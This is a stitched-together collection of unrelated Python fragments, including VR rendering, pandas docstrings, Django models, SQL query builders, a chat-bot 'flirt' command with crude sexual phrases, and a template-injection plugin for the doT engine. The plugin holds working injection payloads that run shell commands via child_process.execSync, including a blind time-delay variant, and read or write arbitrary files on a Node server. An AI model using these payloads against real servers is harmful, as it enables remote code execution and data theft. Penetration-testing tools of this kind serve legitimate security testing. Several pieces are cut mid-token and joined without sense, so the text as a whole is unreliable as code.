        gl.glBlitNamedFramebuffer(self.vr_framebuffers[0].fb, 0, 0, 0, self.vr_framebuffers[0].width, self.vr_framebuffers[0].height, 0, 0, window_size[0], window_size[1], gl.GL_COLOR_BUFFER_BIT, gl.GL_NEAREST)
        gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0)

    def process_input(self):
        """Poll controller state/events; currently a no-op stub.

        The commented code below sketches the intended haptic feedback and
        button-event handling.
        """
        pass
        # state = self.vr_system.getControllerState(1)
        # if state and state.rAxis[1].x > 0.05:
        #     self.vr_system.triggerHapticPulse(1, 0, int(3200 * state.rAxis[1].x))
        # state = self.vr_system.getControllerState(2)
        # if state and state.rAxis[1].x > 0.05:
        #     self.vr_system.triggerHapticPulse(2, 0, int(3200 * state.rAxis[1].x))
        # if self.vr_system.pollNextEvent(self.vr_event):
        #     if self.vr_event.eventType == openvr.VREvent_ButtonPress:
        #         pass #print('vr controller button pressed')
        #     elif self.vr_event.eventType == openvr.VREvent_ButtonUnpress:
        #         pass #print('vr controller button unpressed')

    def shutdown(self):
        """Release controller GL resources and shut down the OpenVR runtime."""
        self.controllers.dispose_gl()
        openvr.shutdown()
ries(range(2), ... index=pd.DatetimeIndex(['2015-03-29 02:30:00', ... '2015-03-29 03:30:00'])) >>> s.tz_localize('Europe/Warsaw', nonexistent='shift_forward') 2015-03-29 03:00:00+02:00 0 2015-03-29 03:30:00+02:00 1 dtype: int64 >>> s.tz_localize('Europe/Warsaw', nonexistent='shift_backward') 2015-03-29 01:59:59.999999999+01:00 0 2015-03-29 03:30:00+02:00 1 dtype: int64 >>> s.tz_localize('Europe/Warsaw', nonexistent=pd.Timedelta('1H')) 2015-03-29 03:30:00+02:00 0 2015-03-29 03:30:00+02:00 1 dtype: int64 """ nonexistent_options = ("raise", "NaT", "shift_forward", "shift_backward") if nonexistent not in nonexistent_options and not isinstance( nonexistent, timedelta ): raise ValueError( "The nonexistent argument must be one of 'raise', " "'NaT', 'shift_forward', 'shift_backward' or " "a timedelta object" ) axis = self._get_axis_number(axis) ax = self._get_axis(axis) def _tz_localize(ax, tz, ambiguous, nonexistent): if not hasattr(ax, "tz_localize"): if len(ax) > 0: ax_name = self._get_axis_name(axis) raise TypeError( f"{ax_name} is not a valid DatetimeIndex or PeriodIndex" ) else: ax = DatetimeIndex([], tz=tz) else: ax = ax.tz_localize(tz, ambiguous=ambiguous, nonexistent=nonexistent) return ax # if a level is given it must be a MultiIndex level or # equivalent to the axis name if isinstance(ax, MultiIndex): level = ax._get_level_number(level) new_level = _tz_localize(ax.levels[level], tz, ambiguous, nonexistent) ax = ax.set_levels(new_level, level=level) else: if level not in (None, 0, ax.name): raise ValueError(f"The level {level} is not valid") ax = _tz_localize(ax, tz, ambiguous, nonexistent) result = self.copy(deep=copy) result = result.set_axis(ax, axis=axis, inplace=False) return result.__finalize__(self, method="tz_localize") # ---------------------------------------------------------------------- # Numeric Methods @final def abs(self: FrameOrSeries) -> FrameOrSeries: """ Return a Series/DataFrame with absolute numeric value of each element. 
This function only applies to elements that are all numeric. Returns ------- abs Series/DataFrame containing the absolute value of each element. See Also -------- numpy.absolute : Calculate the absolute value element-wise. Notes ----- For ``complex`` inputs, ``1.2 + 1j``, the absolute value is :math:`\\sqrt{ a^2 + b^2 }`. Examples -------- Absolute numeric values in a Series. >>> s = pd.Series([-1.10, 2, -3.33, 4]) >>> s.abs() 0 1.10 1 2.00 2 3.33 3 4.00 dtype: float64 Absolute numeric values in a Series with complex numbers. >>> s = pd.Series([1.2 + 1j]) >>> s.abs() 0 1.56205 dtype: float64 Absolute numeric values in a Series with a Timedelta element. >>> s = pd.Series([pd.Timedelta('1 days')]) >>> s.abs() 0 1 days dtype: timedelta64[ns] Select rows with data closest to certain value using argsort (from `StackOverflow <https://stackoverflow.com/a/17758115>`__). >>> df = pd.DataFrame({ ... 'a': [4, 5, 6, 7], ... 'b': [10, 20, 30, 40], ... 'c': [100, 50, -30, -50] ... }) >>> df a b c 0 4 10 100 1 5 20 50 2 6 30 -30 3 7 40 -50 >>> df.loc[(df.c - 43).abs().argsort()] a b c 1 5 20 50 0 4 10 100 2 6 30 -30 3 7 40 -50 """ # error: Incompatible return value type (got "ndarray[Any, dtype[Any]]", # expected "FrameOrSeries") return np.abs(self) # type: ignore[return-value] @final def describe( self: FrameOrSeries, percentiles=None, include=None, exclude=None, datetime_is_numeric=False, ) -> FrameOrSeries: """ Generate descriptive statistics. Descriptive statistics include those that summarize the central tendency, dispersion and shape of a dataset's distribution, excluding ``NaN`` values. Analyzes both numeric and object series, as well as ``DataFrame`` column sets of mixed data types. The output will vary depending on what is provided. Refer to the notes below for more detail. Parameters ---------- percentiles : list-like of numbers, optional The percentiles to include in the output. All should fall between 0 and 1. 
The default is ``[.25, .5, .75]``, which returns the 25th, 50th, and 75th percentiles. include : 'all', list-like of dtypes or None (default), optional A white list of data types to include in the result. Ignored for ``Series``. Here are the options: - 'all' : All columns of the input will be included in the output. - A list-like of dtypes : Limits the results to the provided data types. To limit the result to numeric types submit ``numpy.number``. To limit it instead to object columns submit the ``numpy.object`` data type. Strings can also be used in the style of ``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To select pandas categorical columns, use ``'category'`` - None (default) : The result will include all numeric columns. exclude : list-like
of dtypes or None (default), optional, A black list of data types to omit from the result. Ignored for ``Series``. Here are the options: - A list-like of dtypes : Exclu
des the provided data types from the result. To exclude numeric types submit ``numpy.number``. To exclude object columns submit the data type ``numpy.object``. Strings can also be used in the style of ``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To exclude pandas categorical columns, use ``'category'`` - None (default) : The result will exclude nothing. datetime_is_numeric : bool, default False Whether to treat datetime dtypes as numeric. This affects statistics calculated for the column. For DataFrame input, this also controls whether datetime columns are included by default. .. versionadded:: 1.1.0 Returns ------- Series or DataFrame Summary statistics of the Series or Dataframe provided. See Also -------- DataFrame.count: Count number of non-NA/null observations. DataFrame.max: Maximum of the values in the object. DataFrame.min: Minimum of the values in the object. DataFrame.mean: Mean of the values. DataFrame.std: Standard deviation of the observations. DataFrame.select_dtypes: Subset of a DataFrame including/excluding columns based on their dtype. Notes ----- For numeric data, the result's index will include ``count``, ``mean``, ``std``, ``min``, ``max`` as well as lower, ``50`` and upper percentiles. By default the lower percentile is ``25`` and the upper percentile is ``75``. The ``50`` percentile is the same as
'''OpenGL extension ARB.robustness_application_isolation

This module customises the behaviour of the
OpenGL.raw.WGL.ARB.robustness_application_isolation to provide a more
Python-friendly API

The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/robustness_application_isolation.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.WGL import _types, _glgets
# Re-export every raw binding, then import the private extension-name
# constant used by the availability check below.
from OpenGL.raw.WGL.ARB.robustness_application_isolation import *
from OpenGL.raw.WGL.ARB.robustness_application_isolation import _EXTENSION_NAME

def glInitRobustnessApplicationIsolationARB():
    '''Return boolean indicating whether this extension is available'''
    # Local import mirrors PyOpenGL's generated-code template; it shadows
    # the module-level import above.
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )

### END AUTOGENERATED SECTION
"""
Database ORM models managed by this Django app

Please do not integrate directly with these models!!!  This app currently
offers one programmatic API -- api.py for direct Python integration.
"""
import re

from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import gettext_lazy as _
from model_utils.models import TimeStampedModel
from simple_history.models import HistoricalRecords


class Organization(TimeStampedModel):
    """
    An Organization is a representation of an entity which publishes/provides
    one or more courses delivered by the LMS. Organizations have a base set of
    metadata describing the organization, including id, name, and description.
    """
    # Human-readable organization name; indexed for lookups.
    name = models.CharField(max_length=255, db_index=True)
    # Unique machine-friendly identifier; character set enforced in clean().
    short_name = models.CharField(
        max_length=255,
        unique=True,
        verbose_name='Short Name',
        help_text=_(
            'Unique, short string identifier for organization. '
            'Please do not use spaces or special characters. '
            'Only allowed special characters are period (.), hyphen (-) and underscore (_).'
        ),
    )
    description = models.TextField(null=True, blank=True)
    # Logo image shown on certificates (PNG expected per the help text).
    logo = models.ImageField(
        upload_to='organization_logos',
        help_text=_('Please add only .PNG files for logo images. This logo will be used on certificates.'),
        null=True, blank=True, max_length=255
    )
    # Soft-delete flag: rows are kept but marked inactive rather than deleted.
    # NOTE(review): exact "inactive" semantics depend on api.py callers -- confirm.
    active = models.BooleanField(default=True)
    # django-simple-history audit trail of row changes.
    history = HistoricalRecords()

    def __str__(self):
        """Return a display string combining the full and short names."""
        return f"{self.name} ({self.short_name})"

    def clean(self):
        """Validate short_name against the allowed character set.

        Raises ValidationError if short_name contains anything other than
        alphanumerics, period, hyphen, or underscore.
        """
        if not re.match("^[a-zA-Z0-9._-]*$", self.short_name):
            raise ValidationError(_('Please do not use spaces or special characters in the short name '
                                    'field. Only allowed special characters are period (.), hyphen (-) '
                                    'and underscore (_).'))


class OrganizationCourse(TimeStampedModel):
    """
    An OrganizationCourse represents the link between an Organization and a
    Course (via course key). Because Courses are not true Open edX entities
    (in the Django/ORM sense) the modeling and integrity is limited to that of
    specifying course identifier strings in this model.
    """
    # Opaque course key string; courses are not ORM entities here.
    course_id = models.CharField(max_length=255, db_index=True, verbose_name='Course ID')
    organization = models.ForeignKey(Organization, db_index=True, on_delete=models.CASCADE)
    # Soft-delete flag for the link itself.
    active = models.BooleanField(default=True)
    # django-simple-history audit trail of row changes.
    history = HistoricalRecords()

    class Meta:
        """ Meta class for this Django model """
        # A course may be linked to a given organization at most once.
        unique_together = (('course_id', 'organization'),)
        verbose_name = _('Link Course')
        verbose_name_plural = _('Link Courses')
i
mport kera
s
# Copyright 2014 Intel Corp.
#
# Author: Zhai Edwin <edwin.zhai@intel.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for ceilometer/ipmi/manager.py
"""

from ceilometer.ipmi import manager
from ceilometer.tests import agentbase
import mock
from oslotest import base


class TestManager(base.BaseTestCase):
    """Unit tests for the IPMI AgentManager in isolation."""

    # Pipeline setup reads external configuration, so it is mocked out.
    @mock.patch('ceilometer.pipeline.setup_pipeline', mock.MagicMock())
    def test_load_plugins(self):
        """The manager should discover its pollster extensions."""
        mgr = manager.AgentManager()
        self.assertIsNotNone(list(mgr.pollster_manager))


class TestRunTasks(agentbase.BaseAgentManagerTestCase):
    """Run the shared agent task test suite against the IPMI manager."""

    @staticmethod
    def create_manager():
        # Factory hook used by BaseAgentManagerTestCase to build the
        # manager under test.
        return manager.AgentManager()

    def setUp(self):
        # assumes the base class reads source_resources to decide how
        # resources are supplied -- TODO confirm in agentbase.
        self.source_resources = True
        super(TestRunTasks, self).setUp()
r per-faction special rules. def getFactionCost(self, unit): return sum([self.factionRules[r] for r in unit.specialRules + unit.wargearSp if r in self.factionRules]) class DumpTxt: def __init__(self): self.data = [] def _addUnit(self, unit): data = ['{0} {1} {2}+'.format(prettyName(unit), str(unit.quality), str(unit.basedefense))] data += [', '.join(PrettyEquipments(unit.equipments))] data += [", ".join(unit.specialRules)] data += [", ".join([group.name for group in unit.upgrades])] data += [points(unit.cost)] return '\n'.join([d for d in data if d]) def addUnits(self, units): self.data += [self._addUnit(unit) for unit in units] def _getUpLine(self, equ, cost): return ', '.join(PrettyEquipments(equ)) + ' ' + points(cost) def _getUpGroup(self, group, upgrades): data = '' preamble = group + ' | ' ret = [] for up in upgrades: ret += [preamble + up.text + ':'] ret += [self._getUpLine(addEqu, up.cost[i]) for i, addEqu in enumerate(up.add)] preamble = '' return data + '\n'.join(ret) def addUpgrades(self, upgrades): self.data += [self._getUpGroup(group.name, group) for group in upgrades] def addPsychics(self, psychics): if not psychics: return data = [name + '(' + str(power) + '+): ' + desc for power, spell in psy
chics.items() for name, desc in spell.items()] self.data.append('\n'.join(data)) def get(self, faction): for units, upgrades, spe
cialRules, psychics in faction.pages: self.addUnits(units) self.addUpgrades(upgrades) self.data.append('\n'.join([k + ': ' + v for k, v in specialRules.items()])) self.addPsychics(psychics) return '\n\n'.join(self.data) class DumpTex: def __init__(self): with open('Template/header.tex') as f: self.header = f.read() # Latex uses ~ to prevent line break def no_line_break(self, s): return s.replace(' ', '~') def prettyProfile(self, equipment): if isinstance(equipment, Weapon): return self.no_line_break(equipment.Profile()) return equipment.Profile() # Return a pretty string for latex of the list of equipments def PrettyEquipments(self, equipments): equWithCount = list(OrderedDict.fromkeys([(equ, equipments.count(equ)) for equ in equipments])) return [pCount(c) + self.no_line_break(e.name) + ' ' + self.prettyProfile(e) for e, c in equWithCount] def _addUnit(self, unit): cost = unit.cost equ = ", ".join(['\mbox{' + e + '}' for e in self.PrettyEquipments(unit.equipments)]) sp = ", ".join(unit.specialRules) up = ", ".join([group.name for group in unit.upgrades]) return ' & '.join([prettyName(unit), str(unit.quality), str(unit.basedefense) + '+', equ, sp, up, points(cost)]) def addUnits(self, units): self.data.append('\\UnitTable{') self.data.append('\\\\\n'.join([self._addUnit(unit) for unit in units]) + '}') def _getUpLine(self, equ, cost): return ', '.join(self.PrettyEquipments(equ)) + ' & ' + points(cost) def _getUpGroup(self, group, upgrades): self.data.append('\\UpgradeTable{') data = [] preamble = group + ' | ' for up in upgrades: data += ['\\multicolumn{2}{p{\\dimexpr \\linewidth - 2pt \\relax}}{\\bf ' + preamble + up.text + ': }'] data += [self._getUpLine(addEqu, up.cost[i]) for i, addEqu in enumerate(up.add)] preamble = '' self.data.append('\\\\\n'.join(data) + '}') def addUpgrades(self, upgrades): for group in upgrades: self._getUpGroup(group.name, group) def addSpecialRules(self, sp): if not sp: return self.data.append('\\specialrules') self.data += 
['\\sprule{' + k + '}{' + v + '}' for k, v in sp.items()] def addPsychics(self, psychics): if not psychics: return self.data.append('\\startpsychic{') for quality, spells in psychics.items(): self.data += ['\\psychic{' + k + '}{' + str(quality) + '+}{' + v + '}' for k, v in spells.items()] self.data.append('}') def get(self, faction): self.data = ['\\mytitle{' + faction.title + '}'] self.data.append('\\begin{document}') for units, upgrades, specialRules, psychics in faction.pages: self.addUnits(units) self.data.append('\\begin{multicols*}{3}[]') self.addUpgrades(upgrades) self.addSpecialRules(specialRules) self.addPsychics(psychics) self.data.append('\\end{multicols*}') self.data.append('\\pagebreak') self.data.append('\\end{document}') return self.header + '\n'.join(self.data) class HtmlTag: def __init__(self, tag, content, tagparm=''): self.tag = tag self.content = content self.set_indent(0) self.leaf = isinstance(content, str) if tagparm: self.tagparm = ' ' + tagparm else: self.tagparm = '' def __str__(self): def get_str(c, indent): if isinstance(c, str): return indent + c return str(c) indent = ' ' * self.indent if isinstance(self.content, list): content = '\n'.join(get_str(c, indent) for c in self.content) else: content = self.content if self.leaf: return '{3}<{0}{1}>{2}</{0}>'.format(self.tag, self.tagparm, content, indent) return '{3}<{0}{1}>\n{2}\n{3}</{0}>'.format(self.tag, self.tagparm, content, indent) def set_indent(self, level): self.indent = level if isinstance(self.content, HtmlTag): self.content.set_indent(level + 1) if isinstance(self.content, list): for c in self.content: if isinstance(c, HtmlTag): c.set_indent(level + 1) class DumpHtml: def __init__(self): with open('Template/header.html') as f: self.header = f.read() with open('Template/footer.html') as f: self.footer = f.read() def no_line_break(self, s): return s.replace(' ', '&nbsp;') def points(self, n): return self.no_line_break(points(n)) def _addUnit(self, unit): cells = 
[prettyName(unit), str(unit.quality), str(unit.basedefense) + '+', ',<br> '.join(PrettyEquipments(unit.equipments)), ", ".join(unit.specialRules), ", ".join([group.name for group in unit.upgrades]), self.points(unit.cost)] return [HtmlTag('td', cell) for cell in cells] def addUnits(self, units): table_header = ['Name [size]', 'Qua', 'Def', 'Equipment', 'Special Rules', 'Upg', 'Cost'] rows = [HtmlTag('tr', [HtmlTag('th', title) for title in table_header])] rows.extend([HtmlTag('tr', self._addUnit(unit)) for unit in units]) return HtmlTag('table', rows, 'class=unit') def _getUpLine(self, equ, cost): cells = [',<br>'.join(PrettyEquipments(equ)), self.points(cost)] return [HtmlTag('td', cell) for cell in cells] def _getUpGroup(self, group, upgrades): preamble = group + ' | ' rows = [] for up in upgrades: rows.append(HtmlTag('tr', [HtmlTag('th', preamble + up.text + ':'), HtmlTag('th', '')])) rows.extend(HtmlTag('tr', self._getUpLine(addEqu, up.cost[i])) for i, addEqu in enumerate(up.add)) preamble = '' return HtmlTag('table', rows, 'class=ut1') def addUpgrades(self, upgrades): return [HtmlTag('li', self._getUpGroup(group.name, group)) for group in upgrades] def addSpecialRules(self, specialRules): if not specialRules: return [] lines = [HtmlTag('h3', 'Special Rules')] lines.extend([HtmlTag('li', [HtmlTag('b', name + ': '), desc]) for name, desc in specialRules.item
"""SQL query builders for last.fm play statistics.

Each builder returns a parameterised SQL string; the positional placeholder
style (mysql '%s' vs sqlite '?') is chosen from the configured DBMS.
"""
from lfmconf.lfmconf import get_lastfm_conf

# Monthly play counts; the caller appends the year placeholder
# (see build_query_play_count_by_month).
query_play_count_by_month = """
select *
from view_play_count_by_month v
where substr(v.yr_month, 1, 4) = """

# Common CTE skeleton pairing a "top N" query with the total play count;
# the *_with_remaining templates below append a catch-all row to it.
query_top_with_remaining = """
with top as (
{query_top}
),
total_count as (
{query_play_count}
)
select t.*
from top t
"""

# Appends a synthetic row holding all plays not covered by the top artists.
query_top_artists_with_remaining = query_top_with_remaining + \
    """
union all
select 'Remaining artists' as artist_name,
((select tc.play_count from total_count tc) - (select sum(play_count) from top)) as play_count
"""

# Same catch-all row for albums ('...' fills the unused artist column).
query_top_albums_with_remaining = query_top_with_remaining + \
    """
union all
select 'Remaining albums' as album_name,
'...' as artist_name,
((select tc.play_count from total_count tc) - (select sum(play_count) from top)) as play_count
"""

# Same catch-all row for tracks ('...' fills the unused columns).
query_top_tracks_with_remaining = query_top_with_remaining + \
    """
union all
select 'Remaining tracks' as track_name,
'...' as artist_name,
'...' as album_name,
((select tc.play_count from total_count tc) - (select sum(play_count) from top)) as play_count
"""

# 'VA %' (various-artists) entries are excluded from the artist chart.
query_top_artists = """
select p.artist_name, count(p.id) as play_count
from play p
where p.artist_name not like 'VA %'
{condition}
group by p.artist_name
order by count(p.id) desc
"""

query_top_albums = """
select p.album_name, p.artist_name, count(p.id) as play_count
from play p
where 1 = 1
{condition}
group by p.album_name, p.artist_name
order by count(p.id) desc
"""

query_top_tracks = """
select p.track_name, p.artist_name, p.album_name, count(p.id) as play_count
from play p
where 1 = 1
{condition}
group by p.track_name, p.artist_name, p.album_name
order by count(p.id) desc
"""

query_play_count = """
select count(p.id) as play_count
from play p
where 1 = 1
{condition}
"""

conf = get_lastfm_conf()
# DBMS name ('mysql' or 'sqlite') drives the placeholder style throughout.
dbms = conf['lastfm']['db']['dbms']


def build_query_play_count_by_month():
    """Return the monthly play-count query with a year placeholder."""
    # NOTE(review): implicitly returns None for any other dbms value --
    # callers appear to assume only mysql/sqlite are configured.
    if dbms == 'mysql':
        return query_play_count_by_month + '%s'
    elif dbms == 'sqlite':
        return query_play_count_by_month + '?'


def build_query_play_count_for_duration(duration):
    """Total play count over the last `duration` days."""
    condition = build_duration_condition(duration)
    return query_play_count.format(condition=condition)


def build_query_top_artists_for_duration_with_remaining(duration):
    """Top-artists chart for the last `duration` days plus a remainder row."""
    query_top = build_query_top_artists_for_duration(duration)
    query_count = build_query_play_count_for_duration(duration)
    return query_top_artists_with_remaining.format(query_top=query_top,
                                                   query_play_count=query_count)


def build_query_top_artists_for_duration(duration):
    """LIMITed top-artists chart for the last `duration` days."""
    condition = build_duration_condition(duration)
    return query_top_artists.format(condition=condition) + add_limit()


def add_limit():
    """Return a LIMIT clause with the DBMS-specific placeholder."""
    clause = 'limit '
    if dbms == 'mysql':
        clause += '%s'
    elif dbms == 'sqlite':
        clause += '?'
    return clause


def build_query_top_albums_for_duration_with_remaining(duration):
    """Top-albums chart for the last `duration` days plus a remainder row."""
    query_top = build_query_top_albums_for_duration(duration)
    query_count = build_query_play_count_for_duration(duration)
    return query_top_albums_with_remaining.format(query_top=query_top,
                                                  query_play_count=query_count)


def build_query_top_albums_for_duration(duration):
    """LIMITed top-albums chart for the last `duration` days."""
    condition = build_duration_condition(duration)
    return query_top_albums.format(condition=condition) + add_limit()


def build_query_top_tracks_for_duration_with_remaining(duration):
    """Top-tracks chart for the last `duration` days plus a remainder row."""
    query_top = build_query_top_tracks_for_duration(duration)
    query_count = build_query_play_count_for_duration(duration)
    return query_top_tracks_with_remaining.format(query_top=query_top,
                                                  query_play_count=query_count)


def build_query_top_tracks_for_duration(duration):
    """LIMITed top-tracks chart for the last `duration` days."""
    condition = build_duration_condition(duration)
    return query_top_tracks.format(condition=condition) + add_limit()


def build_query_play_count_for_year():
    """Total play count for a calendar year (year supplied as parameter)."""
    condition = build_year_condition()
    return query_play_count.format(condition=condition)


def build_query_top_artists_for_year_with_remaining():
    """Top-artists chart for a calendar year plus a remainder row."""
    query_top = build_query_top_artists_for_year()
    query_count = build_query_play_count_for_year()
    return query_top_artists_with_remaining.format(query_top=query_top,
                                                   query_play_count=query_count)


def build_query_top_artists_for_year():
    """LIMITed top-artists chart for a calendar year."""
    condition = build_year_condition()
    return query_top_artists.format(condition=condition) + add_limit()


def build_query_top_albums_for_year_with_remaining():
    """Top-albums chart for a calendar year plus a remainder row."""
    query_top = build_query_top_albums_for_year()
    query_count = build_query_play_count_for_year()
    return query_top_albums_with_remaining.format(query_top=query_top,
                                                  query_play_count=query_count)


def build_query_top_albums_for_year():
    """LIMITed top-albums chart for a calendar year."""
    condition = build_year_condition()
    return query_top_albums.format(condition=condition) + add_limit()


def build_query_top_tracks_for_year_with_remaining():
    """Top-tracks chart for a calendar year plus a remainder row."""
    query_top = build_query_top_tracks_for_year()
    query_count = build_query_play_count_for_year()
    return query_top_tracks_with_remaining.format(query_top=query_top,
                                                  query_play_count=query_count)


def build_query_top_tracks_for_year():
    """LIMITed top-tracks chart for a calendar year."""
    condition = build_year_condition()
    return query_top_tracks.format(condition=condition) + add_limit()


def build_duration_condition(duration):
    """Date filter for the last `duration` days; empty if `duration` is
    not a digit string (i.e. no filtering)."""
    condition = ''
    if duration.isdigit():
        if dbms == 'mysql':
            condition = 'and p.play_date > now() + interval - %s day'
        elif dbms == 'sqlite':
            condition =\
                'and date(p.play_date) > date(\'now\', \'-\' || ? || \' day\')'
    return condition


def build_year_condition():
    """Calendar-year filter with the DBMS-specific placeholder."""
    condition = ''
    if dbms == 'mysql':
        condition = 'and year(p.play_date) = %s'
    elif dbms == 'sqlite':
        condition = 'and strftime(\'%Y\', p.play_date) = ?'
    return condition
from utils.strings import quote
from plugins.languages import javascript
from utils.loggers import log
from utils import rand
import base64
import re


class Dot(javascript.Javascript):
    """Detection/exploitation payloads for the doT Javascript template engine.

    Inherits the generic Javascript plugin behaviour and overrides the
    action payloads with doT's {{= }} interpolation / {{ }} evaluation
    syntax. Payload strings are rendered with %-style substitution by the
    framework (e.g. %(path)s, %(code_b64)s).
    """

    def init(self):
        """Register doT-specific payload templates and injection contexts."""
        self.update_actions({
            # Render arbitrary expressions via doT interpolation.
            'render' : {
                'render': '{{=%(code)s}}',
                'header': '{{=%(header)s}}',
                'trailer': '{{=%(trailer)s}}'
            },
            # File writes go through Node's fs module; chunks arrive
            # base64-encoded to survive template quoting.
            'write' : {
                'call' : 'inject',
                'write' : """{{=global.process.mainModule.require('fs').appendFileSync('%(path)s', Buffer('%(chunk_b64)s', 'base64'), 'binary')}}""",
                'truncate' : """{{=global.process.mainModule.require('fs').writeFileSync('%(path)s', '')}}"""
            },
            # File reads return base64 so binary content round-trips.
            'read' : {
                'call': 'evaluate',
                'read' : """global.process.mainModule.require('fs').readFileSync('%(path)s').toString('base64');"""
            },
            # Remote md5 of a file, used to verify transfers.
            'md5' : {
                'call': 'evaluate',
                'md5': """global.process.mainModule.require('crypto').createHash('md5').update(global.process.mainModule.require('fs').readFileSync('%(path)s')).digest("hex");"""
            },
            'evaluate' : {
                # Platform probe used during detection.
                'test_os': """global.process.mainModule.require('os').platform()""",
            },
            # Shell commands are base64-wrapped and run via child_process.
            'execute' : {
                'call': 'evaluate',
                'execute': """global.process.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString());"""
            },
            'execute_blind' : {
                # The bogus prefix is to avoid false detection of Javascript instead of doT
                'call': 'inject',
                'execute_blind': """{{=''}}{{global.process.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i');}}"""
            },
        })

        self.set_contexts([
            # Text context, no closures
            { 'level': 0 },
            # Code context: break out of the current expression, then
            # reopen one so the template still compiles.
            { 'level': 1, 'prefix': '%(closure)s;}}', 'suffix' : '{{1;', 'closures' : javascript.ctx_closures },
        ])
'''Dirty talk like you're in Dundalk'''
import random
import re
import string

__author__ = ('iandioch')

COMMAND = 'flirt'

# Templates applied to each sentence; {s} is the lowercased sentence body
# and {sep} is the terminator ('.', '!' or '?') that ended it, if any.
PHRASES = [
    "rawr~, {s}{sep}",
    "{s}, big boy{sep}",
    "{s} xo",
    "{s} bb{sep}",
    "babe, {s}{sep}",
    "hey xxx {s}{sep}",
    "{s} xxx",
    "{s} xx",
    "{s} xo",
    "{s} xoxo",
    "hot stuff, {s}{sep}",
    "{s} bbz{sep}",
    "{s} 8==)",
    "i'm horny. {s}{sep}",
    "do you want to come over tonight..? {s}{sep}",
    "my parents aren't home, {s}{sep}",
    "{s} ;)",
    "{s} 🍆",
    "{s} 🍆🍆",
    "{s} 🍑",
    "{s} 🍌",
    "{s} 💦💦💦",
    "{s} 👅",
    "{s} 😘😘",
    "{s}, cutie{sep}",
    "{s}, you absolute babe",
    "{s} later???",
]

# Sentence terminators recognised by flirt().
_SENTENCE_END = re.compile(r'[.!?]')


def flirt(message):
    """Rewrite each sentence of `message` as a random flirty phrase.

    The message is split at the earliest '.', '!' or '?'; the leading
    sentence is lowercased and substituted into a random PHRASES template
    (keeping its leading whitespace and its terminator), and the remainder
    is processed recursively. Messages of length <= 1 yield ''.

    BUG FIX: the original iterated `for sep in '.!?'` but returned
    unconditionally on the first iteration, so text was only ever split on
    '.' and the '!' / '?' separators were dead (the trailing
    `return message` was unreachable). Sentences are now split at the
    earliest of all three terminators; a message with no terminator is
    still formatted whole with an empty separator, as before.
    """
    if len(message) <= 1:
        return ''
    match = _SENTENCE_END.search(message)
    if match is not None:
        s = message[:match.start()]
        sepfound = match.group()
        after = message[match.end():]
    else:
        # No terminator: treat the whole message as one sentence.
        s, sepfound, after = message, '', ''
    # Preserve leading whitespace so recursive pieces keep their spacing
    # when concatenated back together.
    numspace = len(s) - len(s.lstrip())
    s = ' ' * numspace + \
        random.choice(PHRASES).format(s=s.lstrip().lower(), sep=sepfound)
    return s + flirt(after)


def main(bot, author_id, message, thread_id, thread_type, **kwargs):
    """Bot entry point: flirt-ify the message preceding the command."""
    # Index [1] is the message before the command message itself.
    message = bot.fetchThreadMessages(thread_id=thread_id, limit=2)[1]
    sauce = flirt(message.text)
    bot.sendMessage(sauce, thread_id=thread_id, thread_type=thread_type)


if __name__ == '__main__':
    print(flirt('hey brandon do you have a minute'))
    print(flirt('I need to talk to you about our lord and saviour steely for a minute. Please brandon.'))
    print(flirt('Fine then'))
    print(flirt('Your API was shit anyway'))
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.

"""Registry for Jasmine spec files."""

import os
import re

from flask_registry import RegistryProxy

from werkzeug.utils import import_string

from invenio_ext.registry import DictModuleAutoDiscoverySubRegistry


class JasmineSpecsAutoDiscoveryRegistry(DictModuleAutoDiscoverySubRegistry):
    """Registry for Jasmine spec files.

    Looks into /testsuite/js/*.spec.js in each module.
    """

    # NOTE(review): despite the docstring, this pattern accepts ANY
    # *.js or *.html file, not only *.spec.js -- confirm intent.
    pattern = re.compile("(?:.+\.js$)|(?:.+\.html$)")

    # Subdirectory of each module's testsuite folder that is scanned.
    specs_folder = 'js'

    def __init__(self, *args, **kwargs):
        """Initialize registry."""
        super(JasmineSpecsAutoDiscoveryRegistry, self).__init__(
            'testsuite', **kwargs
        )

    def keygetter(self, key, original_value, new_value):
        """No key mapping."""
        return key

    def _walk_dir(self, pkg, base, root):
        """Recursively register *.spec.js/*.js files."""
        for root, dirs, files in os.walk(root):
            for name in files:
                if JasmineSpecsAutoDiscoveryRegistry.pattern.match(name):
                    filename = os.path.join(root, name)
                    # Registry key is "<package>/<path relative to base>".
                    filepath = "{0}/{1}".format(
                        pkg, filename[len(base) + 1:]
                    )
                    self.register(filename, key=filepath)

    def _discover_module(self, pkg):
        """Load list of files from resource directory."""
        import_str = pkg + '.' + self.module_name

        try:
            module = import_string(import_str, silent=self.silent)
            if module is not None:
                for p in module.__path__:
                    specsfolder = os.path.join(p, self.specs_folder)
                    if os.path.isdir(specsfolder):
                        self._walk_dir(pkg, specsfolder, specsfolder)
        except ImportError as e:  # pylint: disable=C0103
            self._handle_importerror(e, pkg, import_str)
        except SyntaxError as e:
